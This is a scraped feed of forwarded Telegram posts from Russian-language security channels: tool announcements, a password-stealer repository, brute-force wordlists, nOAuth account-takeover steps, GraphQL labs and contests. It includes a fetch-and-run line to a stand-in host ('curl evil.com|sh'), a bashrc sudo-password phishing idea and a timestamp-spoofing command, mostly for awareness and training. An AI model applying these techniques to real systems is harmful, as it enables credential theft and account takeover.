Forwarded from vx-underground
Today VirusTotal announced that each sample uploaded will be accompanied by "Code Insight". Code Insight uses Sec-PaLM, one of the generative AI models by Google, to explain what the malicious binary is doing.
Code Insight is available to all users.
tl;dr "they took my job"
Code Insight is available to all users.
tl;dr "they took my job"
😢2
Forwarded from Записки админа
🛠 Встала, вроде бы, простая задачка - получить дамп трафика для конкретного приложения в Linux.
Для реализации нашлась утилита nsntrace, которое делает нужное за счёт выполнения приложения в отдельном сетевом неймспейсе. Набросал короткую заметку по этому поводу...
📗 https://sysadmin.pm/nsntrace/
#network #trace #pcap
Для реализации нашлась утилита nsntrace, которое делает нужное за счёт выполнения приложения в отдельном сетевом неймспейсе. Набросал короткую заметку по этому поводу...
📗 https://sysadmin.pm/nsntrace/
#network #trace #pcap
👍1
Полезная штука для #privesc
Если получить шелл под пользователем но не знать пароль от пользователя (например просто внаглую подойти и сделать
Получается защита от подобного сейчас одна - мониторинг логов/SIEM, что для рядового пользователя линукса не подходит. Как вот теперь спокойно запускать
Если получить шелл под пользователем но не знать пароль от пользователя (например просто внаглую подойти и сделать
curl evil.com|sh, или через эксплойт), можно с её помощью попытаться зафишить пароль. Вообще, bashrc и подобные файлы редко регулярно проверяются, а таймштамп можно подменить через touch -a -m -t <timestamp> <file>Получается защита от подобного сейчас одна - мониторинг логов/SIEM, что для рядового пользователя линукса не подходит. Как вот теперь спокойно запускать
sudo, и не параноить по поводу bashrc?😢1
Forwarded from Cybred
https://github.com/ph4ntonn/Impost3r/
Impost3r is a tool that aim to steal many kinds of linux passwords (including ssh, su, sudo) written by C. Attackers can use Impost3r to make a trap to steal the legal user's passwords.
When Impost3r steal the sudo password successfully, it will automatically clean the traces it make on the target server.
Impost3r is a tool that aim to steal many kinds of linux passwords (including ssh, su, sudo) written by C. Attackers can use Impost3r to make a trap to steal the legal user's passwords.
When Impost3r steal the sudo password successfully, it will automatically clean the traces it make on the target server.
GitHub
GitHub - ph4ntonn/Impost3r: 👻Impost3r -- A linux password thief
👻Impost3r -- A linux password thief. Contribute to ph4ntonn/Impost3r development by creating an account on GitHub.
Forwarded from Нетипичный Безопасник (Мефодий Келевра) (MiF)
Находка дня https://weakpass.com/
Сайт с огромной базой словарей для брута, все разложено по полочкам, подписано что для чего, плюс автор сам выпускает свои подборки пользуйтесь🤘
Сайт с огромной базой словарей для брута, все разложено по полочкам, подписано что для чего, плюс автор сам выпускает свои подборки пользуйтесь🤘
Forwarded from $NATCH | Global Digital Bank
Итак, мы готовы объявить победителей нашего конкурса по взлому онлайн банка!
🎊Напомним призовой фонд:🎊
1️⃣место - 25 000₽ + мерч
2️⃣место - 15 000₽ + мерч
3️⃣место - 10 000₽ + мерч
🏆Наши победители конкурса по взлому онлайн банка🏆
🥇место - lewaperbb
🥈место - MagnumMalum
🥉место - darling_x0r
🎁Мы свяжемся с победителями в репортах на нашей площадке, и конечно ждем вас в 17.30 на нашем стенде для награждения мерчем!🎁
🎈Поздравляем победителей и благодарим всех участников!🎈
🎊Напомним призовой фонд:🎊
1️⃣место - 25 000₽ + мерч
2️⃣место - 15 000₽ + мерч
3️⃣место - 10 000₽ + мерч
🏆Наши победители конкурса по взлому онлайн банка🏆
🥇место - lewaperbb
🥈место - MagnumMalum
🥉место - darling_x0r
🎁Мы свяжемся с победителями в репортах на нашей площадке, и конечно ждем вас в 17.30 на нашем стенде для награждения мерчем!🎁
🎈Поздравляем победителей и благодарим всех участников!🎈
🔥8👏1
Forwarded from Anton Kutepov
Open Security Week — онлайн-спринт для экспертов ИБ
Приглашаю присоединиться к первому онлайн-спринту от сообщества Security Experts Community, который пройдет с 1 по 14 июня. В этот раз будем писать правила корреляции на языке XP.
Как вы знаете, в SOLDR есть модуль коррелятора, поэтому созданная экспертиза будет актуальна для пользователей нашего проекта.
Созданные правила будут опубликованы в открытом репозитории и будут доступны всем желающим.
Чтобы стать участником:
👉🏻 оставь заявку
🖊 подпишись на телеграм-канал
📅 дождись публикации задания 1 июня
Мы будем не соревноваться, а сообща решать актуальные задачи кибербезопасности. Все участники получат памятные подарки и приглашение на ламповый митап, где можно будет познакомиться и пообщаться лично.🍻
Приглашаю присоединиться к первому онлайн-спринту от сообщества Security Experts Community, который пройдет с 1 по 14 июня. В этот раз будем писать правила корреляции на языке XP.
Как вы знаете, в SOLDR есть модуль коррелятора, поэтому созданная экспертиза будет актуальна для пользователей нашего проекта.
Созданные правила будут опубликованы в открытом репозитории и будут доступны всем желающим.
Чтобы стать участником:
👉🏻 оставь заявку
🖊 подпишись на телеграм-канал
📅 дождись публикации задания 1 июня
Мы будем не соревноваться, а сообща решать актуальные задачи кибербезопасности. Все участники получат памятные подарки и приглашение на ламповый митап, где можно будет познакомиться и пообщаться лично.🍻
❤1👍1
Forwarded from SHADOW:Group
На сайтах, где идентификация идет по Email и есть возможность войти через Microsoft OAuth есть риск захвата аккаунта.
Дело в том, что Azure не проверяет установленную в аккаунте почту, что позволяет вам указать почту жертвы и войти на уязвимый сайт через OAUTH от ее имени.
- Жертва регается на сайте через свою почту.
- Заходим в Azure AD и меняем свою почту на почту жертвы.
- Заходим на сайт через Microsoft OAuth и получаем доступ к аккаунту жертвы.
Видео PoC
#web #ato #oauth
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
nOAuth | OAuth Implementation Flaw Affecting Azure AD OAuth Applications
nOAuth is an authentication implementation flaw that can affect Microsoft Azure AD multi-tenant OAuth applications. This demo video explains how the misconfiguration can lead to full account takeover and how to prevent it.
This blog on nOAuth has more details:…
This blog on nOAuth has more details:…
🔥5
Forwarded from Cybred
Теория
— What is GraphQL?
— Finding GraphQL endpoints
— Exploiting unsanitized arguments
— Discovering schema information
— Bypassing GraphQL introspection defences
— Bypassing rate limiting using aliases
— GraphQL CSRF
Практика
— Accessing private GraphQL posts
— Accidental exposure of private GraphQL fields
— Finding a hidden GraphQL endpoint
— Bypassing GraphQL brute force protections
— Performing CSRF exploits over GraphQL
На Portswigger добавили новые лабы с GraphQL. Для сдачи экзамена пока не обязательны.
— What is GraphQL?
— Finding GraphQL endpoints
— Exploiting unsanitized arguments
— Discovering schema information
— Bypassing GraphQL introspection defences
— Bypassing rate limiting using aliases
— GraphQL CSRF
Практика
— Accessing private GraphQL posts
— Accidental exposure of private GraphQL fields
— Finding a hidden GraphQL endpoint
— Bypassing GraphQL brute force protections
— Performing CSRF exploits over GraphQL
На Portswigger добавили новые лабы с GraphQL. Для сдачи экзамена пока не обязательны.
portswigger.net
What is GraphQL? | Web Security Academy
GraphQL is an API query language that is designed to facilitate efficient communication between clients and servers. It enables the user to specify exactly ...
👍3
Кто ещё не видел, отличный ресурс - очень много статей (papers) по ВПО (malware), и не только
https://www.vx-underground.org/
https://www.vx-underground.org/
👍3🔥3